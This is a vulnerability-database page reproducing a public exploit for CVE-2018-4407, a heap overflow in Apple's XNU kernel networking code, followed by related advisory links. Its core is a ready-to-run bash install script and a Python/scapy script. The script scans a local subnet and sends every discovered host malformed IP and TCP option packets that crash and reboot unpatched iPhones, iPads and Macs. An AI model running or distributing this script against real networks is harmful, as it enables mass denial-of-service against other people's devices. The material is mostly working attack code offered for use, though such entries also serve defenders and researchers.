Lucene search
0day Today Team1337DAY-ID-31545HistoryNov 06, 2018 - 12:00 a.m.
XNU Kernel iOS / macOS heap buffer overflow Exploit
2018-11-0600:00:00
0day Today Team
0day.today
319
0.114 Low
EPSS
Percentile
94.7%
The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.#### Usage Info
Installation
bash install.sh
#! /bin/bash
sudo apt install python3 python3-pip nmap
pip3 uninstall nmap
pip3 uninstall python-nmap
pip3 install python-nmap scapy
Usage
python3 exploit.py
#! /usr/bin/python3
import os
import time
import nmap
import struct
from scapy.all import *
def attack(src='192.168.1.95', subnet='192.168.1.0/24'):
print ("0day.today Scanning network, please wait...")
nm = nmap.PortScanner()
nm.scan(hosts=subnet, arguments='-sP')
list_of_ips = nm.all_hosts()
list_of_ips = sorted(list_of_ips, key=lambda ip: struct.unpack("!L", inet_aton(ip))[0])
payload = ""
for i in range(40):
payload+="x"
for host in list_of_ips:
print("[*] Sending Payload to "+host+" | Payload: "+payload)
send(IP(src=src, dst=host, options=payload)/TCP(options=[(19,"x"*18),(19,"x"*18)]))
time.sleep(0.2)
if __name__ == '__main__':
try:
if not os.geteuid() == 0:
sys.exit('\nscapy requires root privileges.\n')
isdefault = input('Default mode configuration:\nYour IP: 192.168.1.95\nYour subnet: 192.168.1.0/24\nGo to custom configuration ? ["yes"/"no"] ')
if isdefault=='no':
attack()
else:
src = input('What is YOUR IP address ? (example: 192.168.1.95) ')
subnet = input('What is the subnet address ? (example: 192.168.1.0/24) ')
attack(src=src, subnet=subnet)
except KeyboardInterrupt:
print('\nInterrupted\n')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
# 0day.today [2018-11-06] #Related
cve
cve
CVE-2018-4407
2019-04-03 18:29:00
prion
prion
Memory corruption
2019-04-03 18:29:00
googleprojectzero
googleprojectzero
Designing sockfuzzer, a network syscall fuzzer for XNU
2021-04-22 00:00:00
SockPuppet: A Walkthrough of a Kernel Exploit for iOS 12.4
2019-12-10 00:00:00
An iOS zero-click radio proximity exploit odyssey
2020-12-01 00:00:00
threatpost
threatpost
Apple Fixes Multiple macOS, iOS Bugs Including a Quirky FaceTime Bug
2018-10-31 16:52:43
kitploit
kitploit
Darksplitz - Exploit Framework
2019-04-04 21:12:00
github
github
openvas
openvas
Apple Mac OS X Security Updates (HT209193)-06
2018-11-02 00:00:00
Apple Mac OS X Security Update (HT209139)
2022-08-04 00:00:00
apple
apple
About the security content of watchOS 5
2018-09-17 00:00:00
About the security content of watchOS 5 - Apple Support
2019-08-01 04:36:25
About the security content of tvOS 12 - Apple Support
2019-08-01 04:44:27
nessus
nessus
macOS 10.13.6 Multiple Vulnerabilities (Security Update 2018-002)
2018-10-31 00:00:00
macOS < 10.14 Multiple Vulnerabilities
2018-10-18 00:00:00
macOS and Mac OS X Multiple Vulnerabilities (Security Update 2018-005)
2018-10-31 00:00:00